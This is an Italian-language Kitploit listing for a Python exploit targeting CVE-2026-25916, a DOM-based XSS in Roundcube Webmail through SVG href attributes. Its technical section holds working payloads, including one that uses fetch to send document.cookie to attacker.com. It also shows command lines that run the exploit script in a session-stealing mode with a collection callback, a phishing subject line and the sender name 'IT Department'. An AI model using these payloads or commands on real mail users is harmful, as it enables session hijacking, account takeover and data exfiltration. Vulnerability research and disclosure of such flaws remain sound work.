Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute — Exploit Python per XSS basato su DOM in Roundcube Webmail (CVE-2026-25916) tramite attributi href SVG, che consente il dirottamento della sessione e l'esfiltrazione di dati attraverso email appositamente create. | Kitploit
Strumenti/GitHubGitHub/mbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebSicurezza Email
GitHubmbanyamer/cve-2026-25916-roundcube-webmail-dom-based-xss-exploit-via-svg-href-attribute

CVE-2026-25916-Roundcube-Webmail-DOM-based-XSS-Exploit-via-SVG-href-Attribute

Exploit Python per XSS basato su DOM in Roundcube Webmail (CVE-2026-25916) tramite attributi href SVG, che consente il dirottamento della sessione e l'esfiltrazione di dati attraverso email appositamente create.

Vedi Repository
316 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-25916: Exploit DOM XSS in Roundcube Webmail

📋 Informazioni sull'Exploit

Titolo dell'Exploit: DOM XSS in Roundcube Webmail tramite href SVG (CVE-2026-25916)
Autore: Mohammed Idrees Banyamer
Contatto: GitHub @mbanyamer | Instagram @banyamer_security
Paese: Giordania
Data: 9 febbraio 2026
CVE: CVE-2026-25916
Tipo: Cross-Site Scripting (XSS) basato su DOM
Piattaforma: Applicazione Web
Testato su: Roundcube 1.6.8, Ubuntu 22.04
Punteggio CVSS: 6.1 (Medio)

🚨 Disclaimer Legale

⚠️ AVVERTENZA: Questo exploit è destinato esclusivamente a scopi educativi e di test autorizzati.
Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta.
L'autore non è responsabile di usi impropri o attività illegali.

📖 Descrizione della Vulnerabilità

Le versioni di Roundcube Webmail precedenti alla 1.6.9 contengono una vulnerabilità XSS basata su DOM nella gestione degli SVG. L'applicazione non sanifica correttamente gli attributi e negli elementi SVG, consentendo l'esecuzione di JavaScript tramite email appositamente create.

href
xlink:href

Versioni Affette: Roundcube Webmail < 1.6.9
Corretta in: Versione 1.6.9 (Commit 26d7677)
CWE: CWE-79 - Neutralizzazione impropria dell'input durante la generazione di pagine web
Vettore di attacco: Remoto tramite email
Impatto: Dirottamento della sessione, furto dell'account, esfiltrazione dei dati

🔧 Dettagli Tecnici

La vulnerabilità risiede in rcube_washtml.php dove gli attributi href negli elementi SVG non venivano validati correttamente:

root@kitploit:~
<!-- Elementi SVG vulnerabili -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'[email protected]'})">

```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u [email protected] -w your_password -r [email protected]
root@kitploit:~
python3 cve-2026-25916.py \
  -s smtp.gmail.com \
  -p 587 \
  -u [email protected] \
  -w app_password \
  -r [email protected] \
  -t session_steal \
  --callback https://yourserver.com/collect \
  --subject "Security Alert" \
  --from-name "IT Department"
Scarica lo strumento